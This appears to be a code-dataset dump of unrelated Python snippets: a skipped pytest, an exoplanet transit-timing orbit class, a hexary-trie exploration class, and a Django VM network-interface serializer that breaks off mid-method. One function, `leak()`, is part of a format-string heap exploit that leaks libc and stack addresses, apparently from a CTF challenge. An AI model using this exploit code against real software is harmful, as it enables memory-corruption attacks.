code stringlengths 281 23.7M |
|---|
# NOTE(review): the two decorator lines of this test were garbled in extraction —
# a bare `(reason=...)` fragment and a truncated `_db(transaction=True)`. They are
# reconstructed below as the conventional pytest skip marker plus pytest-django's
# `django_db` marker; confirm against the upstream file.
import pytest


@pytest.mark.skip(reason='Commenting these out while we have `transaction_search_gold` vs `transaction_search` in the TABLE_SPEC as by design the data in delta will be different from the data in postgres')
@pytest.mark.django_db(transaction=True)
def test_load_table_to_from_delta_for_transaction_search_testing(spark, s3_unittest_data_bucket, populate_usas_data_and_recipients_from_broker, hive_unittest_metastore_db):
    """Skipped placeholder: Delta Lake vs. Postgres parity check for transaction search."""
    pass
class TTVOrbit(KeplerianOrbit):
    """A Keplerian orbit whose transit times deviate from a linear ephemeris (TTVs).

    At least one of the keyword arguments ``ttvs`` or ``transit_times`` must be
    given (``ttvs`` takes precedence when both are present); all remaining
    args/kwargs are forwarded to :class:`KeplerianOrbit`:

    - ``ttvs``: per-planet sequences of transit-timing offsets from the linear
      ephemeris.
    - ``transit_times``: per-planet sequences of observed transit times; a
      closed-form least-squares line (slope = period, intercept = t0) is fit to
      them and the residuals become the TTVs.
    - ``transit_inds``: optional per-planet integer transit indices (defaults to
      ``0..N-1`` for each planet).
    """

    def __init__(self, *args, **kwargs):
        ttvs = kwargs.pop('ttvs', None)
        transit_times = kwargs.pop('transit_times', None)
        transit_inds = kwargs.pop('transit_inds', None)
        if ((ttvs is None) and (transit_times is None)):
            raise ValueError("one of 'ttvs' or 'transit_times' must be defined")
        if (ttvs is not None):
            # TTVs given directly: store one 1D tensor per planet plus the
            # transit indices they correspond to.
            self.ttvs = [as_tensor_variable(ttv, ndim=1) for ttv in ttvs]
            if (transit_inds is None):
                self.transit_inds = [tt.arange(ttv.shape[0]) for ttv in self.ttvs]
            else:
                self.transit_inds = [tt.cast(as_tensor_variable(inds, ndim=1), 'int64') for inds in transit_inds]
        else:
            # Transit times given: fit a linear ephemeris to each planet's
            # times; the residuals from that fit are the TTVs.
            self.transit_times = []
            self.ttvs = []
            self.transit_inds = []
            period = []
            t0 = []
            for (i, times) in enumerate(transit_times):
                times = as_tensor_variable(times, ndim=1)
                if (transit_inds is None):
                    inds = tt.arange(times.shape[0])
                else:
                    inds = tt.cast(as_tensor_variable(transit_inds[i]), 'int64')
                self.transit_inds.append(inds)
                # Closed-form least squares for: times ~ intercept + slope * inds.
                N = times.shape[0]
                sumx = tt.sum(inds)
                sumx2 = tt.sum((inds ** 2))
                sumy = tt.sum(times)
                sumxy = tt.sum((inds * times))
                denom = ((N * sumx2) - (sumx ** 2))
                slope = (((N * sumxy) - (sumx * sumy)) / denom)
                intercept = (((sumx2 * sumy) - (sumx * sumxy)) / denom)
                expect = (intercept + (inds * slope))
                period.append(slope)
                t0.append(intercept)
                self.ttvs.append((times - expect))
                self.transit_times.append(times)
            kwargs['t0'] = tt.stack(t0)
            # The period implied by the transit times may differ from the
            # orbital period handed to KeplerianOrbit below.
            self.ttv_period = tt.stack(period)
            if ('period' not in kwargs):
                if ('delta_log_period' in kwargs):
                    # Orbital period expressed as a log-offset from the transit period.
                    kwargs['period'] = tt.exp((tt.log(self.ttv_period) + kwargs.pop('delta_log_period')))
                else:
                    kwargs['period'] = self.ttv_period
        super(TTVOrbit, self).__init__(*args, **kwargs)
        if (ttvs is not None):
            # TTVs were supplied directly: reconstruct the transit times from
            # the linear ephemeris (t0 + period * ind) plus the TTV offsets.
            self.ttv_period = self.period
            self.transit_times = [((self.t0[i] + (self.period[i] * self.transit_inds[i])) + ttv) for (i, ttv) in enumerate(self.ttvs)]
        # Dense grid of transit times for indices 0..max(ind): linear-ephemeris
        # predictions, overwritten with the known times where available.
        self.all_transit_times = []
        for (i, inds) in enumerate(self.transit_inds):
            expect = (self.t0[i] + (self.period[i] * tt.arange((inds.max() + 1))))
            self.all_transit_times.append(tt.set_subtensor(expect[inds], self.transit_times[i]))
        # Piecewise-constant lookup tables per planet: bin edges are midpoints
        # between consecutive transit times (padded by half a transit period on
        # each end); bin values are the transit times themselves.
        self._bin_edges = [tt.concatenate(([(tts[0] - (0.5 * self.ttv_period[i]))], (0.5 * (tts[1:] + tts[:(- 1)])), [(tts[(- 1)] + (0.5 * self.ttv_period[i]))])) for (i, tts) in enumerate(self.all_transit_times)]
        self._bin_values = [tt.concatenate(([tts[0]], tts, [tts[(- 1)]])) for (i, tts) in enumerate(self.all_transit_times)]

    def _get_model_dt(self, t):
        # For each time in t, look up the transit time of the bin it falls
        # into, per planet; result has one extra trailing axis (planets).
        vals = []
        for i in range(len(self.ttvs)):
            inds = tt.extra_ops.searchsorted(self._bin_edges[i], t)
            vals.append(self._bin_values[i][inds])
        return tt.stack(vals, (- 1))

    def _warp_times(self, t, _pad=True):
        # Subtract each planet's nearest model transit time from t.
        # NOTE(review): downstream presumably re-centers on the linear
        # ephemeris (e.g. adds t0 back) — confirm against KeplerianOrbit usage.
        if _pad:
            return (tt.shape_padright(t) - self._get_model_dt(t))
        return (t - self._get_model_dt(t))
def leak():
    """Leak a libc address and a stack location via a format-string write,
    populating the globals ``libc_base`` and ``ret_addr``.

    NOTE(review): relies on module-level helpers/objects defined elsewhere in
    the exploit script (``delete``, ``edit``, ``submit``, ``io``, ``libc``,
    ``p64``, ``log``).
    """
    global libc_base, ret_addr
    delete(2)
    # Format string: print 2617 chars, write that count via %13$hn, then dump
    # the 31st and 33rd stack qwords (parsed as the two leaks below).
    payload = ((('%' + str(2617)) + 'c%13$hn') + '%31$p%33$p')
    payload = payload.ljust(116, 'A').ljust(128, '\x00')
    # Two qwords appended after the 128-byte padding (0 and 337) — presumably a
    # fake chunk header; confirm against the heap layout of the target binary.
    payload += (p64(0) + p64(337))
    edit(1, payload)
    submit(p64(6295992))  # 6295992 == 0x6011b8; target address for the write
    io.recvuntil('0x')
    leak_addr1 = int(io.recv(12), 16)  # first %p leak: return into __libc_start_main+240
    libc_base = ((leak_addr1 - 240) - libc.symbols['__libc_start_main'])
    io.recvuntil('0x')
    leak_addr2 = int(io.recv(12), 16)  # second %p leak: a stack pointer
    ret_addr = (leak_addr2 - 496)      # fixed offset down to the saved return address
    log.info(('leak_addr1: 0x%x' % leak_addr1))
    log.info(('leak_addr2: 0x%x' % leak_addr2))
    log.info(('libc_base: 0x%x' % libc_base))
    log.info(('ret_addr: 0x%x' % ret_addr))
class HexaryTrieFog():
    """Tracks which parts of a hexary trie have and have not been explored.

    The unexplored key space is kept as a sorted set of key prefixes (in
    nibbles). Exploring a prefix replaces it with the sub-segments that remain
    foggy beneath it. Mutating operations return a *new* ``HexaryTrieFog``.

    NOTE(review): this block's decorators were stripped in extraction (a stray
    ``_tuple`` line stood where ``@staticmethod``/``@to_tuple`` belonged, and
    ``_new_trie_fog``/``deserialize`` take ``cls``). They are restored below;
    ``_prefix_distance`` now returns a tuple directly instead of relying on an
    external ``@to_tuple`` decorator — a tuple is required for the ``<``
    comparison performed in :meth:`nearest_unknown`.
    """
    _unexplored_prefixes: GenericSortedSet[Nibbles]

    def __init__(self) -> None:
        # Start fully foggy: the empty prefix () covers the entire key space.
        self._unexplored_prefixes = SortedSet({()})

    def __repr__(self) -> str:
        return f'HexaryTrieFog<{self._unexplored_prefixes!r}>'

    def is_complete(self) -> bool:
        """Return True when no unexplored prefixes remain."""
        return (len(self._unexplored_prefixes) == 0)

    def explore(self, old_prefix_input: NibblesInput, foggy_sub_segments: Sequence[NibblesInput]) -> 'HexaryTrieFog':
        """Replace ``old_prefix`` with the child segments that are still foggy.

        :raises ValidationError: if ``old_prefix`` is not currently unexplored,
            if duplicate sub-segments are supplied, or if one sub-segment is an
            ancestor (prefix) of another.
        """
        old_prefix = Nibbles(old_prefix_input)
        sub_segments = [Nibbles(segment) for segment in foggy_sub_segments]
        new_fog_prefixes = self._unexplored_prefixes.copy()
        try:
            new_fog_prefixes.remove(old_prefix)
        except KeyError:
            raise ValidationError(f'Old parent {old_prefix} not found in {new_fog_prefixes!r}')
        if (len(set(sub_segments)) != len(sub_segments)):
            raise ValidationError(f'Got duplicate sub_segments in {sub_segments} to HexaryTrieFog.explore()')
        # Only when segments have mixed lengths can one be an ancestor of another.
        all_lengths = set((len(segment) for segment in sub_segments))
        if (len(all_lengths) > 1):
            for segment in sub_segments:
                shorter_lengths = [length for length in all_lengths if (length < len(segment))]
                for check_length in shorter_lengths:
                    trimmed_segment = segment[:check_length]
                    if (trimmed_segment in sub_segments):
                        raise ValidationError(f'Cannot add {segment} which is a child of segment {trimmed_segment}')
        new_fog_prefixes.update([(old_prefix + segment) for segment in sub_segments])
        return self._new_trie_fog(new_fog_prefixes)

    def mark_all_complete(self, prefix_inputs: Sequence[NibblesInput]) -> 'HexaryTrieFog':
        """Remove the given prefixes from the unexplored set.

        :raises ValidationError: if any prefix is not currently unexplored.
        """
        new_unexplored_prefixes = self._unexplored_prefixes.copy()
        for prefix in map(Nibbles, prefix_inputs):
            if (prefix not in new_unexplored_prefixes):
                raise ValidationError(f'When marking {prefix} complete, could not find in {new_unexplored_prefixes!r}')
            new_unexplored_prefixes.remove(prefix)
        return self._new_trie_fog(new_unexplored_prefixes)

    def nearest_unknown(self, key_input: NibblesInput=()) -> Nibbles:
        """Return the unexplored prefix nearest to ``key``, on either side.

        :raises PerfectVisibility: if nothing is unexplored.
        """
        key = Nibbles(key_input)
        index = self._unexplored_prefixes.bisect(key)
        if (index == 0):
            # Nothing to the left of the key; first prefix (if any) is nearest.
            try:
                return self._unexplored_prefixes[0]
            except IndexError as exc:
                raise PerfectVisibility('There are no more unexplored prefixes') from exc
        elif (index == len(self._unexplored_prefixes)):
            # Nothing to the right of the key.
            return self._unexplored_prefixes[(- 1)]
        else:
            nearest_left = self._unexplored_prefixes[(index - 1)]
            nearest_right = self._unexplored_prefixes[index]
            # Per-nibble distance tuples compare lexicographically.
            left_distance = self._prefix_distance(nearest_left, key)
            right_distance = self._prefix_distance(key, nearest_right)
            if (left_distance < right_distance):
                return nearest_left
            else:
                return nearest_right

    def nearest_right(self, key_input: NibblesInput) -> Nibbles:
        """Return the unexplored prefix nearest to ``key``, looking right only.

        A prefix that ``key`` starts with covers the key itself and is also
        a valid result.

        :raises PerfectVisibility: if nothing is unexplored.
        :raises FullDirectionalVisibility: if nothing is unexplored to the right.
        """
        key = Nibbles(key_input)
        index = self._unexplored_prefixes.bisect(key)
        if (index == 0):
            try:
                return self._unexplored_prefixes[0]
            except IndexError as exc:
                raise PerfectVisibility('There are no more unexplored prefixes') from exc
        else:
            nearest_left = self._unexplored_prefixes[(index - 1)]
            if key_starts_with(key, nearest_left):
                # The left neighbour is a parent prefix of the key.
                return nearest_left
            else:
                try:
                    return self._unexplored_prefixes[index]
                except IndexError as exc:
                    raise FullDirectionalVisibility(f'There are no unexplored prefixes to the right of {key}') from exc

    @staticmethod
    def _prefix_distance(low_key: Nibbles, high_key: Nibbles) -> Iterable[int]:
        """Return a tuple of per-nibble deltas from ``low_key`` up to ``high_key``.

        Missing trailing nibbles are filled with the furthest value on each
        side (15 for the low key, 0 for the high key). The resulting tuples
        are compared lexicographically by callers.
        """
        def _deltas() -> Iterable[int]:
            for (low_nibble, high_nibble) in zip_longest(low_key, high_key, fillvalue=None):
                final_low_nibble = 15 if (low_nibble is None) else low_nibble
                final_high_nibble = 0 if (high_nibble is None) else high_nibble
                yield (final_high_nibble - final_low_nibble)
        # Materialize so the result is orderable (was @to_tuple upstream).
        return tuple(_deltas())

    @classmethod
    def _new_trie_fog(cls, unexplored_prefixes: SortedSet) -> 'HexaryTrieFog':
        """Build a fog directly from a prefix set, bypassing __init__'s default."""
        copy = cls()
        copy._unexplored_prefixes = unexplored_prefixes
        return copy

    def serialize(self) -> bytes:
        """Serialize to bytes; round-trips through :meth:`deserialize`."""
        prefixes = [encode_nibbles(nibbles) for nibbles in self._unexplored_prefixes]
        return f'HexaryTrieFog:{prefixes!r}'.encode()

    @classmethod
    def deserialize(cls, encoded: bytes) -> 'HexaryTrieFog':
        """Inverse of :meth:`serialize`.

        :raises ValueError: if ``encoded`` lacks the expected marker prefix.
        """
        serial_prefix = b'HexaryTrieFog:'
        if (not encoded.startswith(serial_prefix)):
            raise ValueError(f'Cannot deserialize this into HexaryTrieFog object: {encoded!r}')
        else:
            encoded_list = encoded[len(serial_prefix):]
            # literal_eval only parses Python literals, so this is safe.
            prefix_list = ast.literal_eval(encoded_list.decode())
            deserialized_prefixes = SortedSet((Nibbles(decode_nibbles(prefix)) for prefix in prefix_list))
            return cls._new_trie_fog(deserialized_prefixes)

    def __eq__(self, other: Any) -> bool:
        if (not isinstance(other, HexaryTrieFog)):
            return False
        else:
            return (self._unexplored_prefixes == other._unexplored_prefixes)
class VmDefineNicSerializer(s.Serializer):
    """Validates and (de)serializes one NIC definition of a VM.

    Incoming VM JSON is normalized by :meth:`fix_before`; outgoing JSON is
    produced by :meth:`jsondata`. The ``validate_*``/:meth:`validate` methods
    resolve the subnet and IP objects and enforce permissions; the ``save_*``
    helpers persist IP/DNS side effects.

    NOTE(review): several decorators appear to have been stripped from this
    copy of the file (see the bare ``_api_exception`` lines and the comments
    at ``save_a``, ``save_ptr``, ``_remove_vm_ip_association``,
    ``_create_vm_ip_association``, ``_update_vm_ip_association`` and ``data``)
    — confirm against upstream before relying on call semantics.
    """
    mac = s.MACAddressField(required=False)
    model = s.ChoiceField(choices=Vm.NIC_MODEL, default=settings.VMS_NIC_MODEL_DEFAULT)
    net = s.CharField()
    ip = s.IPAddressField(required=False)
    netmask = s.IPAddressField(read_only=True)
    gateway = s.IPAddressField(read_only=True)
    primary = s.BooleanField(default=False)
    dns = s.BooleanField(default=False)
    use_net_dns = s.BooleanField(default=False)
    allow_dhcp_spoofing = s.BooleanField(default=False)
    allow_ip_spoofing = s.BooleanField(default=False)
    allow_mac_spoofing = s.BooleanField(default=False)
    allow_restricted_traffic = s.BooleanField(default=False)
    allow_unfiltered_promisc = s.BooleanField(default=False)
    allowed_ips = s.IPAddressArrayField(default=list(), max_items=NIC_ALLOWED_IPS_MAX)
    monitoring = s.BooleanField(default=False)
    set_gateway = s.BooleanField(default=True)
    mtu = s.IntegerField(read_only=True, required=False)

    def __init__(self, request, vm, *args, **kwargs):
        self.request = request
        self.vm = vm
        self.dc_settings = dc_settings = vm.dc.settings
        self.nic_id = kwargs.pop('nic_id', None)
        self.resolvers = vm.resolvers
        # Internal state populated by fix_before()/validate():
        self._dns = []                 # existing DNS A records matching this NIC's IP
        self._net = None               # resolved Subnet object
        self._net_old = None           # previous Subnet when the net is being changed
        self._ip = None                # resolved IPAddress object (False => DHCP passthrough)
        self._ip_old = None            # previous IPAddress when the IP is being changed
        self._ips = ()                 # resolved allowed_ips IPAddress queryset
        self._ips_old = ()             # previous allowed_ips being released
        self._changing_allowed_ips = False
        self._monitoring_old = None
        if (len(args) > 0):
            # Initializing from existing VM JSON: normalize it first.
            if isinstance(args[0], list):
                data = map(self.fix_before, args[0])
            else:
                data = self.fix_before(args[0])
            super(VmDefineNicSerializer, self).__init__(data, *args[1:], **kwargs)
        else:
            super(VmDefineNicSerializer, self).__init__(*args, **kwargs)
        # First NIC defaults to being the primary/DNS NIC.
        if (self.nic_id == 0):
            self.fields['dns'].default = True
            self.fields['primary'].default = True
        # VMS_NIC_MONITORING_DEFAULT is 1-based; nic_id is 0-based.
        if (self.nic_id == (dc_settings.VMS_NIC_MONITORING_DEFAULT - 1)):
            self.fields['monitoring'].default = True
        # Template-provided defaults override the built-in ones.
        if ((self.nic_id is not None) and vm.template):
            for (field, value) in vm.template.get_vm_define_nic(self.nic_id).items():
                try:
                    self.fields[field].default = value
                except KeyError:
                    pass
        if vm.is_kvm():
            self.fields['model'].default = dc_settings.VMS_NIC_MODEL_DEFAULT
        else:
            self.fields['model'].default = 'virtio'

    def fix_before(self, data):
        """Normalize raw VM NIC JSON into serializer input, resolving DB objects."""
        if data.get('network_uuid', None):
            try:
                self._net = Subnet.objects.get(uuid=data['network_uuid'])
                data['net'] = self._net.name
            except Subnet.DoesNotExist:
                raise APIError(detail='Unknown net in NIC definition.')
            else:
                del data['network_uuid']
        else:
            data['net'] = None
        if ('vlan_id' not in data):
            data['vlan_id'] = 0
        if ('mtu' not in data):
            data['mtu'] = None
        if ('primary' not in data):
            data['primary'] = False
        ip = data.get('ip', None)
        if ip:
            try:
                if (self._net and self._net.dhcp_passthrough and (ip == 'dhcp')):
                    # Externally managed network: no concrete IP stored.
                    data['ip'] = ip = None
                    data['netmask'] = None
                    data['gateway'] = None
                    self._ip = False
                else:
                    self._ip = IPAddress.objects.get(ip=ip, subnet=self._net)
            except IPAddress.DoesNotExist:
                raise APIError(detail='Unknown ip in NIC definition.')
        allowed_ips = data.get('allowed_ips', None)
        if (allowed_ips is not None):
            self._ips = IPAddress.objects.filter(ip__in=allowed_ips, subnet=self._net)
            data['allowed_ips'] = list(set(allowed_ips))
        # Derive the virtual "dns" flag from existing matching A records.
        data['dns'] = False
        if (ip and self.vm.hostname_is_valid_fqdn()):
            dns = RecordView.Record.get_records_A(self.vm.hostname, self.vm.fqdn_domain)
            if dns:
                for record in dns:
                    if (record.content == ip):
                        self._dns.append(record)
                        data['dns'] = True
        # Derive "use_net_dns" from whether VM resolvers match the net's.
        if (self._net and (self._net.get_resolvers() == self.vm.resolvers)):
            data['use_net_dns'] = True
        else:
            data['use_net_dns'] = False
        # Derive "monitoring" from whether this NIC's IP is the monitoring IP.
        self._monitoring_old = (self.vm.monitoring_ip == ip)
        if self._monitoring_old:
            data['monitoring'] = True
        else:
            data['monitoring'] = False
        data['set_gateway'] = bool(data.get('gateway', None))
        return data

    def jsondata(self):
        """Inverse of fix_before(): serializer object -> VM JSON NIC dict."""
        data = dict(self.object)
        if ('net' in data):
            subnet = data.pop('net')
            if subnet:
                data['network_uuid'] = str(self._net.uuid)
        # Virtual fields that must not leak into the VM JSON.
        data.pop('dns', None)
        data.pop('use_net_dns', None)
        data.pop('monitoring', None)
        data.pop('set_gateway', None)
        if ((not data.get('ip')) and self._net.dhcp_passthrough):
            # Externally managed network is marked with the literal 'dhcp'.
            data['ip'] = 'dhcp'
            data.pop('netmask', None)
            data.pop('gateway', None)
        return data

    def detail_dict(self, **kwargs):
        """Task-detail dict; includes addressing info whenever net/IP changed."""
        ret = super(VmDefineNicSerializer, self).detail_dict(**kwargs)
        ret.pop('nic_id', None)
        if (self._net_old or (self._ip_old is not None)):
            ret['ip'] = self.object.get('ip', None)
            ret['netmask'] = self.object.get('netmask', None)
            ret['gateway'] = self.object.get('gateway', None)
            ret['allowed_ips'] = self.object.get('allowed_ips', [])
        return ret

    def validate_mac(self, attrs, source):
        # MAC is immutable once the VM is deployed.
        try:
            value = attrs[source]
        except KeyError:
            pass
        else:
            if (self.object and self.vm.is_deployed()):
                if ((not value) or (self.object.get('mac', None) != value)):
                    raise s.ValidationError(_('Cannot change MAC address.'))
        return attrs

    def validate_set_gateway(self, attrs, source):
        # set_gateway is immutable once the VM is deployed.
        try:
            value = attrs[source]
        except KeyError:
            pass
        else:
            if (self.object and self.vm.is_deployed() and (self.object.get('set_gateway', None) != value)):
                raise s.ValidationError(_('Cannot change gateway.'))
        return attrs

    def _validate_insecure_boolean_attr(self, attrs, source):
        # Only staff may enable the security-sensitive allow_* flags.
        try:
            value = attrs[source]
        except KeyError:
            return attrs
        if ((not self.request.user.is_staff) and value):
            raise s.ValidationError(PERMISSION_DENIED)
        return attrs

    def validate_allow_dhcp_spoofing(self, attrs, source):
        return self._validate_insecure_boolean_attr(attrs, source)

    def validate_allow_ip_spoofing(self, attrs, source):
        return self._validate_insecure_boolean_attr(attrs, source)

    def validate_allow_mac_spoofing(self, attrs, source):
        return self._validate_insecure_boolean_attr(attrs, source)

    def validate_allow_restricted_traffic(self, attrs, source):
        return self._validate_insecure_boolean_attr(attrs, source)

    def validate_allow_unfiltered_promisc(self, attrs, source):
        return self._validate_insecure_boolean_attr(attrs, source)

    def validate_primary(self, attrs, source):
        # At most one NIC may carry the primary flag.
        try:
            value = attrs[source]
        except KeyError:
            pass
        else:
            if ((value is True) and (self.nic_id is not None)):
                other_nics = self.vm.json_get_nics()
                if other_nics:
                    try:
                        # Exclude the NIC currently being edited.
                        del other_nics[self.nic_id]
                    except IndexError:
                        pass
                    for n in other_nics:
                        if (n.get('primary', False) is True):
                            raise s.ValidationError(_('Cannot enable primary flag on multiple NICs.'))
        return attrs

    def validate_net(self, attrs, source):
        # Resolve the subnet by name and check availability/permissions.
        try:
            value = attrs[source]
        except KeyError:
            pass
        else:
            if value:
                if (self.object and self._net and (self._net.name == value)):
                    # Unchanged net: nothing to resolve.
                    return attrs
                try:
                    _net = get_subnets(self.request).get(name=value)
                except Subnet.DoesNotExist:
                    raise s.ObjectDoesNotExist(value)
                else:
                    if (_net.access in Subnet.UNUSABLE):
                        raise s.ObjectDoesNotExist(value)
                if self.vm.node:
                    validate_nic_tags(self.vm, new_net=_net)
                if (self.object and (self._net != _net)):
                    self._net_old = self._net
                    # Inherited NIC attributes cannot be updated in place.
                    if ((self.object.get('mtu', None) and (_net.mtu is None)) or _net.vxlan_id):
                        raise s.ValidationError(_('This field cannot be changed because some inherited NIC attributes (MTU, nic_tag) cannot be updated. Please remove the NIC and add a new NIC.'))
                self._net = _net
        return attrs

    def _check_ip_usage(self, ipaddress, allowed_ips=False):
        """Return an error message if ipaddress cannot be used by this VM, else None."""
        ip = ipaddress.ip
        if ((ipaddress.usage == IPAddress.VM_REAL) and (ipaddress.vm == self.vm)):
            if (ipaddress.ip in self.vm.json_get_ips()):
                return (_('Object with name=%s is already used.') % ip)
        else:
            if (ipaddress.vm is not None):
                return (_('Object with name=%s is already used as default address.') % ip)
            if allowed_ips:
                if (ipaddress.usage not in (IPAddress.VM, IPAddress.VM_REAL)):
                    return (_('Object with name=%s is not available.') % ip)
                for other_vm in ipaddress.vms.exclude(uuid=self.vm.uuid):
                    if (other_vm.dc != self.vm.dc):
                        return (_('Object with name=%s is already used as additional address in another virtual datacenter.') % ip)
            else:
                if (ipaddress.usage != IPAddress.VM):
                    return (_('Object with name=%s is not available.') % ip)
                if ipaddress.vms.exists():
                    return (_('Object with name=%s is already used as additional address.') % ip)
        return None

    def validate(self, attrs):
        """Cross-field validation: resolve/assign IP, allowed_ips and net-derived attrs."""
        net = self._net
        assert net
        # --- primary IP address ---
        if (('ip' in attrs) and attrs['ip']):
            ip = attrs['ip']
            if (self.object and (not self._net_old) and self._ip and (self._ip.ip == ip)):
                pass  # unchanged IP on unchanged net
            else:
                try:
                    _ip = IPAddress.objects.get(ip=ip, subnet=net)
                except IPAddress.DoesNotExist:
                    self._errors['ip'] = s.ObjectDoesNotExist(ip).messages
                    return attrs
                else:
                    error = self._check_ip_usage(_ip)
                    if error:
                        self._errors['ip'] = s.ErrorList([error])
                        return attrs
                    if (self._ip and (self._ip != _ip)):
                        self._ip_old = self._ip
                    self._ip = _ip
                    attrs['ip'] = self._ip.ip
        elif (self._net_old or (not attrs.get('ip', True))):
            # Net changed or IP explicitly cleared: release the old IP.
            self._ip_old = self._ip
            self._ip = None
        # --- allowed_ips ---
        allowed_ips = list(set(attrs.get('allowed_ips', [])))
        if allowed_ips:
            _ips = IPAddress.objects.filter(ip__in=allowed_ips, subnet=net)
            if (self.object and (not self._net_old) and self._ips and (self._ips == _ips)):
                pass  # unchanged allowed_ips
            else:
                ip_list = _ips.values_list('ip', flat=True)
                if (len(ip_list) != len(allowed_ips)):
                    self._errors['allowed_ips'] = s.ErrorList([(_('Object with name=%s does not exist.') % i) for i in allowed_ips if (i not in ip_list)])
                    return attrs
                if (self._ip and (self._ip.ip in allowed_ips)):
                    self._errors['allowed_ips'] = s.ErrorList([_('The default IP address must not be among allowed_ips.')])
                    return attrs
                errors = [err for err in (self._check_ip_usage(ipaddress, allowed_ips=True) for ipaddress in _ips) if (err is not None)]
                if errors:
                    self._errors['allowed_ips'] = s.ErrorList(errors)
                    return attrs
                if (self._ips and (self._ips != _ips)):
                    # Release only the addresses no longer in the new set.
                    self._ips_old = self._ips.exclude(ip__in=ip_list)
                self._ips = _ips
                self._changing_allowed_ips = True
                attrs['allowed_ips'] = list(set(ip_list))
        elif (self._ips and (self._net_old or ('allowed_ips' in attrs))):
            # allowed_ips cleared (or net changed): release all of them.
            attrs['allowed_ips'] = list()
            self._ips_old = self._ips
            self._ips = ()
            self._changing_allowed_ips = True
        # --- DNS/monitoring restrictions on externally managed networks ---
        if net.dhcp_passthrough:
            try:
                dns = attrs['dns']
            except KeyError:
                dns = self.object['dns']
            try:
                monitoring = attrs['monitoring']
            except KeyError:
                monitoring = self.object['monitoring']
            if (dns or monitoring):
                if dns:
                    self._errors['dns'] = s.ErrorList([_('Cannot enable DNS for externally managed network.')])
                if monitoring:
                    self._errors['monitoring'] = s.ErrorList([_('Cannot enable monitoring for externally managed network.')])
                return attrs
        # --- automatic IP selection ---
        if (not self._ip):
            if net.dhcp_passthrough:
                self._ip = False
                attrs['ip'] = None
                attrs['netmask'] = None
                attrs['gateway'] = None
            else:
                try:
                    # Random free IP from the subnet, excluding allowed_ips.
                    self._ip = IPAddress.objects.filter(subnet=net, vm__isnull=True, vms=None, usage=IPAddress.VM).exclude(ip__in=allowed_ips).order_by('?')[0:1].get()
                except IPAddress.DoesNotExist:
                    raise s.ValidationError((_('Cannot find free IP address for net %s.') % net.name))
                else:
                    logger.info('IP address %s for NIC ID %s on VM %s was chosen automatically', self._ip, self.nic_id, self.vm)
                    attrs['ip'] = self._ip.ip
        # --- attributes inherited from the subnet ---
        if (self._ip is not False):
            assert (self._ip and attrs.get('ip', True))
            attrs['netmask'] = net.netmask
            attrs['gateway'] = net.gateway
            try:
                set_gateway = attrs['set_gateway']
            except KeyError:
                set_gateway = self.object['set_gateway']
            if (not set_gateway):
                attrs['gateway'] = None
        attrs['vlan_id'] = net.vlan_id
        if net.vxlan_id:
            attrs['nic_tag'] = ('%s/%s' % (net.nic_tag, net.vxlan_id))
        else:
            attrs['nic_tag'] = net.nic_tag
        attrs['mtu'] = net.mtu
        if ('use_net_dns' in attrs):
            if attrs['use_net_dns']:
                self.resolvers = net.get_resolvers()
            elif self.object:
                self.resolvers = self.dc_settings.VMS_VM_RESOLVERS_DEFAULT
        return attrs

    # NOTE(review): the bare `_api_exception` line below looks like a garbled
    # decorator (likely `@catch_api_exception`, presumably combined with
    # `@staticmethod` — note that save_a takes no `self`); confirm upstream.
    _api_exception
    def save_a(request, task_id, vm, ip, dns=(), delete=False):
        """Create/update (or delete) the DNS A record for vm's hostname -> ip."""
        if (not vm.dc.settings.DNS_ENABLED):
            logger.info('DNS support disabled: skipping DNS A record saving for vm %s', vm)
            return None
        if (not vm.hostname_is_valid_fqdn()):
            logger.warn('Valid domain for vm %s not found. Could not %s DNS A record.', vm, ('delete' if delete else 'add'))
            return None
        record_cls = RecordView.Record
        ip = str(ip.ip)
        domain = vm.fqdn_domain
        logger.info('%s DNS A record for vm %s, domain %s, name %s.', ('Deleting' if delete else 'Adding/Updating'), vm, domain, ip)
        if (not dns):
            dns = record_cls.get_records_A(vm.hostname, domain)
        if delete:
            method = 'DELETE'
            data = {}
        else:
            records_exist = [(record.content == ip) for record in dns]
            if (records_exist and all(records_exist)):
                # All existing A records already point to this IP.
                logger.info('DNS A record for vm %s, domain %s, name %s already exists.', vm, domain, ip)
                return True
            if len(dns):
                method = 'PUT'
                data = {'content': ip}
            else:
                method = 'POST'
                dns = (record_cls(domain=RecordView.internal_domain_get(domain, task_id=task_id)),)
                data = {'type': record_cls.A, 'name': vm.hostname.lower(), 'domain': domain, 'content': ip}
        for record in dns:
            RecordView.internal_response(request, method, record, data, task_id=task_id, related_obj=vm)
        return True

    # NOTE(review): the bare `_api_exception` line below looks like a garbled
    # decorator (likely `@catch_api_exception` + `@staticmethod`, as above).
    _api_exception
    def save_ptr(request, task_id, vm, ip, net, delete=False, content=None):
        """Create/update (or delete) the DNS PTR record for ip in net's PTR domain."""
        dc_settings = vm.dc.settings
        if (not dc_settings.DNS_ENABLED):
            logger.info('DNS support disabled: skipping DNS PTR record saving for vm %s', vm)
            return None
        record_cls = RecordView.Record
        ipaddr = str(ip.ip)
        ptr = record_cls.get_record_PTR(ipaddr, net.ptr_domain)
        logger.info('%s DNS PTR record for vm %s, domain %s, name %s.', ('Deleting' if delete else 'Adding'), vm, net.ptr_domain, ipaddr)

        def default_ptr(server, ip_address):
            # Fall back to a safe placeholder when DNS_PTR_DEFAULT is malformed.
            placeholders = {'hostname': server.hostname, 'alias': server.alias, 'ipaddr': ip_address.replace('.', '-')}
            try:
                return dc_settings.DNS_PTR_DEFAULT.format(**placeholders)
            except (KeyError, ValueError, TypeError) as e:
                logger.error('Could not convert DNS_PTR_DEFAULT (%s) for IP %s of VM %s. Error was: %s', dc_settings.DNS_PTR_DEFAULT, ip_address, server, e)
                return 'ptr-{ipaddr}.example.com'.format(**placeholders)

        if ptr:
            if delete:
                method = 'DELETE'
                data = {}
            else:
                method = 'PUT'
                data = {'content': (content or default_ptr(vm, ipaddr))}
        elif delete:
            # Nothing to delete.
            return None
        else:
            ptr = record_cls(domain=RecordView.internal_domain_get(net.ptr_domain, task_id=task_id))
            method = 'POST'
            data = {'type': record_cls.PTR, 'domain': net.ptr_domain, 'name': record_cls.get_reverse(ipaddr, net.ptr_domain), 'content': (content or default_ptr(vm, ipaddr))}
        return RecordView.internal_response(request, method, ptr, data, task_id=task_id, related_obj=vm)

    # NOTE(review): takes no `self` — presumably decorated with @staticmethod upstream.
    def _remove_vm_ip_association(vm, ip, many=False):
        logger.info('Removing association of IP %s with vm %s.', ip, vm)
        if ((ip.usage == IPAddress.VM_REAL) and vm.is_deployed()):
            # Real (deployed) addresses are detached later by vm_manage.
